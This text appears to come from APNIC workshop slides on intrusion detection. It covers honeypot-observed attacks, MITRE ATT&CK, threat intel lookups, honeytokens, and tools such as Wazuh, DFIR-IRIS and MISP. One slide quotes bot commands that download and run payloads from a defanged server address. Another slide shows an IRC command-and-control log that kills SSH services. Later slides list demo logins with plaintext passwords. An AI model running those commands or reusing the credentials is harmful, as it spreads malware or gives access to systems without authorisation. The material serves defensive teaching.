1. Introduction to Intrusion
Detection
Adli Wahid
adli@apnic.net

2. Let’s Connect!
Adli Wahid (LinkedIn)

3. The Plan
oObjectives
oAwareness about how threats are executed
oImportance of knowledge driven security
oThinking Process
oNot focusing on specific tools**
oDetection
oUnderstanding Attacks
oExamples
oLet’s make this interactive

4. We are Under Attack!

5. Perspective & Context
• Successful or Attempts
• Example:
oActual Login OR
oPort scanning
• Example
• Actual Login AND / OR
• Download & Execute payload
• Other aspects
• Targeted Assets, Source of Attack, Timing,
Files/Artifacts

6. Where does it fit?
Identify Protect Detect Respond Recover
NIST Cyber Security Framework (v1)
6

7. Detection
• Key concept in security monitoring, ”detection
engineering”
• Know Your Enemy
• You are the target
• Attacker have capabilities & motives
• Provide Assurance
• Important to understand the different threats
and how they are executed
• Detect implies
• monitoring and knowing what to monitor by
someone
• Being alerted when something happens
• Stages of attack
• Drive action
• Or Policy Change (POST)
• MITRE ATTACK Framework

8. Observing Attacks
• From APNIC Community Honeynet Project

9. Multiple Stages
• Typical
o Scanning
o Initial Access
o Execution
o Initial infection
o Actual Payload
o Persistence
• Architecture
• Initial Host
• Serving Payload
• Command & Control
• Managing
X
Target 1
Target
2
9

10. Knock, Knock!
Timestamp, src_ip, username_attempted, password_attempted
2022-01-13T01:05:26.128718, 117.111.1.143,root,root
2022-01-13T01:18:41.854533, 117.111.1.145,root,root
2022-01-13T05:39:01.444840, 117.111.1.250,root,root
2022-01-13T05:49:50.868138, 117.111.1.139,root,root
2022-01-13T06:24:06.955896, 117.111.1.183,root,root
2022-01-13T08:48:02.869449, 117.111.1.233,root,root
2022-01-13T11:04:05.756191, 117.111.1.168,root,root
2022-01-13T12:29:53.474695, 117.111.1.46,root,root
2022-01-13T12:57:57.219175, 117.111.1.60,root,root
2022-01-13T13:12:33.592252, 117.111.1.186,root,root
10

11. Once Inside
Src_ip, URL
58.212.107.27,hxxp://61.177.137.133/x/1sh,CN
67.172.200.77,hxxp://61.177.137.133/x/1sh,US
93.131.187.222,hxxp://61.177.137.133/x/1sh,DE
94.224.178.41,hxxp://61.177.137.133/x/1sh,BE
103.125.154.119,hxxp://61.177.137.133/x/1sh,IN
109.219.53.72,hxxp://61.177.137.133/x/1sh,FR
112.53.197.138,hxxp://61.177.137.133/x/1sh,CN
117.111.1.202,hxxp://61.177.137.133/x/1sh,KR
150.101.96.34,hxxp://61.177.137.133/x/1sh,AU
11
B
B
B
B
B
S
T T
B – Bots
T – Target
S – Payload Server

12. Execution – The Script
wget hxxp://61.177.137.133/x/tty0 -O /var/run/tty0 ; chmod +x /var/run/tty0 ; chmod 777
/var/run/tty0 ; /var/run/tty0 > /dev/null 2>&1 &
wget hxxp://61.177.137.133/x/tty1 -O /var/run/tty1 ; chmod +x /var/run/tty1 ; chmod 777
/var/run/tty1 ; /var/run/tty1 > /dev/null 2>&1 &
wget hxxp://61.177.137.133/x/tty2 -O /var/run/tty2 ; chmod +x /var/run/tty2 ; chmod 777
/var/run/tty2 ; /var/run/tty2 > /dev/null 2>&1 &
wget hxxp://61.177.137.133/x/tty3 -O /var/run/tty3 ; chmod +x /var/run/tty3 ; chmod 777
/var/run/tty3 ; /var/run/tty3 > /dev/null 2>&1 &
12

13. Communication with Command and Control
Server
1. Malware Download
05/25/2021-02:14:51.304265 [**] [1:2019240:14] ET POLICY Executable
and linking format (ELF) file download Over HTTP [**] [Classification:
Potential Corporate Privacy Violation] [Priority: 1] {TCP} 71.127.148.69:80 ->
10.0.2.15:39526
2. IRC Communication
05/25/2021-02:14:53.336178 [**] [1:2000345:16] ET MALWARE IRC Nick
change on non-standard port [**] [Classification: A Network Trojan was
detected] [Priority: 1] {TCP} 10.0.2.15:54206 -> 202.28.32.30:8080
13

14. C2
B B
B
B B
NICK x86|x|1|919043|server
USER x00 localhost localhost :2021g
:IRC!IRC@0x.01 PRIVMSG x86|x|1|919043|server :.VERSION.
:. 010 . 127.0.0.1 6667 :
:. 005 . :
:. 376 . :
NICK x86|x|1|919043|server
MODE x86|x|1|919043|server -xi
JOIN #0x86 :777
NICK x86|x|1|919043|server
MODE x86|x|1|919043|server -xi
JOIN #0x86 :777
:x86|x|1|919043|server!x00@x.y.z.k JOIN :#0x86
:bot!.@. PRIVMSG #0x86 :!* SH ( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; service sshd stop ; sudo service
sshd stop ; killall -9 sshd dropbear ; kill -9 `pidof sshd` `pidof dropbear` )>/dev/null 2>&1 &
NOTICE bot :
:0x.01 412 x86|x|1|919043|server :No text to send
S
?
IRC Communication (2)
14

15. Adversary Tactic & Techniques
• Framework / Knowledge Base of adversary tactic (goals) and
techniques (the how) based on real observation
• Helps the defender to have realistic threat awareness
• Website https://attack.mitre.org/
• Different Focus / Views
• Enterprise, Mobile, ICS
• Mitigations
• Groups **

16. What Are The Detection Opportunities?
• System / Host
• Service
• Disk
• RAM
• Network
• Src/DST, Payload, Certificates
• What are other important artifacts?
• URLs, Binaries/Files, Hashes
• What tools can we use
• How can we confirm?

17. Threat Intel Databases
• Purpose:
o Look up your own assets
o Indicators that you can use to monitor (hunt)
• Free & Commercial
• We can use it to look things up
o www.virustotal.com
o https://www.dshield.org/
o Many AVs/EDRs/CTI companies have subscriptions
• Community based – i.e. CERTs/CSIRT community uses MISP
• https://www.misp-project.org/
• Webinar on Threat Intel Sharing
• Automation
https://pastebin.com/K8nGtVYt

18. File Integrity Monitoring
• Changes to disk
• Is it authorized? What is it?
o /etc/resolv.conf
o New Crontab entries
o Registry
• What if file is deleted immediately by attacker after execution?
• It can be recovered (if system is running) /proc
• Activities can be observed (on system or from RAM)
• What tools can we use?
• AV / EDR
• Centralized logging – Sysmon, filebeats + Elasticsearch + create rules + Alerting
• Wazuh

19. Other Activities On Host
• Adding / Removing /Modifying
• Users
• Services
• Applications
• Files
• Config
• CPU / Process
• Going Deeper ***
oProfiling attacks
oAttribution

20. Network
• Compromised host need to call home!
• Detection based on content/headers of network packets
o (Known) Exploits
o Threat Intel
o IP / Domain is Command & Control
o IP is a TOR Exit node
o Details in CERTIFICATEs during TSL handshake session
• Network Intrusion Detection System
• Packet capture / Dissector + Signature matching + threat intel
• Suricata *** / Zeek
• Arkime

21. Encrypted Traffic

22. It’s always the DNS
• DNS
oIf host is looking up known malicious or suspicious domain
oEven if it is block or prevented **
oDo you have visibility of the DNS
• Scenario
• One host compromised
• DNS query to monero.miningpool.zyx
• Question – is there any other host that has been compromised?

23. Honeypots & Honey Tokens
• How do we know if attackers are in our infrastructure?
• Exploit attackers activities
o Lateral movement – scan and/or connect to other services
o Accessing documents, files , starting service
• Honeypots
o Emulate services that has no production value
o Any access is suspect (no / very low false positive)
o Monitor for attempts to access / exploit
o Open source & Commercial solutions available
• Honeytokens
o Digital artifacts that has no production value
o Once accessed/loaded/open we will get an alert
Scan For Server Config

24. HoneyTokens
www.canarytokens.org

25. Detection by Others
• IPs from your network scanning/attacking other hosts on the
Internet
• One of your server hosting malware
• Database from one of your server is on the darkweb
• Stolen credentials from password stealers or botnet
• Someone discover a vulnerability on your website **
• Proactively looking for these things is possible
• Let other security teams, researchers notify you
• But How?
Haveibeenpwned.com
Shodan.io

26. Get Notified
Shodan.io
Haveibeenpwned.com
Daily Scans with API

27. Security.txt
• Security Contact information on your website
• www.yourdomain.com/security.txt
• Basically information – on how to contact the security person in
charge + what is the scope + PGP keys
• www.securitytxt.org

28. CERT/CSIRT
• Dedicated team for dealing with incidents
• Monitor emails
• Integrate with ticketing system / Slack alert etc
• Process in places for processing the report
• National CERT/CSIRT would normally be contacted by other external
or international teams
• www.apcert.org
• www.first.org
• In the absence of one maybe sure you are reachable
• WHOIS IP
• WHOIS Domain

29. Wrapping UP
• Detection is a critical concept
o Mitigate attack in progress
o Improve security policies / Better Controls
o Awareness
• Implies knowledge in attacker techniques and tactics
o Analysts needed!
• Coverage / Visibility
o Due to limitation of tech or blind spot
• Detection technologies – signature based have limitations
• AI?
• Note: Attackers are human J
• Incident Response Plan
o Practice
o Trusted Network
• Dealing with unknown
• Using MITRE Attack Framework
• Allocate for regular learning / conference / sharing

30. Learning More
• Check out some free courses with Labs on
https://academy.apnic.net
oSecurity Monitoring
oHoneypot
o Suricata IDS 101
oThreat Intel Sharing Webinar

31. Day #5
• Recap of Day #4
• Traffic light protocol
• Systems / Demo
o Wazuh
oDFIR-IRIS (Case Management)
oMISP – Community Wide Sharing
• Operation Security
• Moving Forward
sudo shutdown –h now

32. Day 4 Recap
• MITRE Attack Framework
• Understanding stages of attack
• Break down into Tactic & Teqniques
• Breack down by platform (Linux, Windows, etc)
• Detection!
• Mapping with groups, integration with Tools etc etc
oLabs
o Memory Dump & Packet Analysis
o Volatility
o Suricata (IDS / Packet Analysis)
o Artifacts, Indicators of Compromise Extraction
o academy.apnic.net
o Future workshops?

33. Sharing - Rules of Engagement
• Important for building trust!
o Need to know basis
• Telling others:
• How the information should be handled
• Our expectation
• Who can they share it with
• Enforcement
• By systems i.e. to prevent accidental leak
• How
• Label & Warning
• CERT /CSIRT Community - Traffic Light Protocol (TLP)

34. FIRST.org Traffic Light Protocol -
https://www.first.org/tlp/

37. Tools for Enabling Sharing (and Investigation)
EDR / SIEM
/etc /
Security
Monitoring
Case /
Incident
Management
INTERNAL
Community
Threat
Sharing
Platform
Community
Other
Community
Threat
Sharing
Platform
Threat Intel DB for
enrichment
Analysis Engines

38. Tools for Enabling Sharing (and Investigation)
Wazuh DFIR-IRIS
INTERNAL
MISP
Community
Other
Community
Threat
Sharing
Platform
Threat Intel DB for
enrichment
Analysis Engines

39. Wazuh
owww.wazuh.com
oSIEM / EDR – Free & Open Source
oFile Integrity Monitoring
oAuthentication
oIntegration with other tools (i.e. Suricata, Yara)
oActive Respone
oAgent / Agentless ***
oIntegration with TI to enrich IOC (Indicators of Compromise)
oOther – Vulnerability, Compliance,
oAPIs – send data to other platforms

40. Wazuh
• File Integrity Monitoring
• VirusTotal (API needed)
• Suricata Alerts
• Authentication
• Vulnerability Management
https://wazuh.honeynet.asia
admin
SecretPassword

41. DFIR-IRIS
• Track Elements observed during investigation
• Collaboration - share pieces of information between analysts
• Automation i.e. Enrichment of IOCs

42. DFIR-IRIS
• Adding Cases from investigation
• Adding IOCs
• Asset Link
• Assigning Task
• Timeline
• Integration with other tools
• VT / MISP for enrichment
https://iris.honeynet.asia
User: alice
Password: FijiWorkshop2023
User: bob
Password: FijiWorkshop2023

43. MISP
• Threat Sharing Platform for Community
• Open Source and Free
• Many Community Uses it
• Demo
• Adding Events
• Adding Attributes
• Other features of the tool
https://misp.honeynet.asia
Username:
fijiworkshop@company.com
FijiWorkshop2023

44. Operational Security
• Ethical (https://www.ethicsfirst.org)
• Dealing with malicious activities and criminal infrastructure
• Dedicate device / VM
o Network
o i.e. accidentally executing malware in the network
• VPN / TOR
• Anonymising IP address
• Tor-project.org
• Quick Demo using torify
• Encryption
• Email: PGP**
• Other Channels
• Slack, Signal, Keybase

45. Moving Forward – FJ Critical Infrastructure
Group
• Rethink about improving your security
o https://github.com/certsocietegenerale/IRM
o https://ciso-ksp.kpnnet.org/framework/KSP
o https://www.first.org/resources/guides/Establishing-CSIRT-v1.2.pdf
• Setting up this community and group
• What we need :
1. Rules of engagement (i.e TLP) and Expectations
2. Regular Activities
3. Infrastructure – web, email, servers
4. Volunteers
5. Planning for future events
6. Initiatives / Problems to address (Minimum security / Vuln)
7. Engagements
• Who else should we invite and convince to join J
• Who can contribute?

46. Discussion
Contact
adli@apnic.net
Adli Wahid on LinkedIN

47. Thank You
Adli Wahid (LinkedIn)
adli@apnic.net
www.apnic.net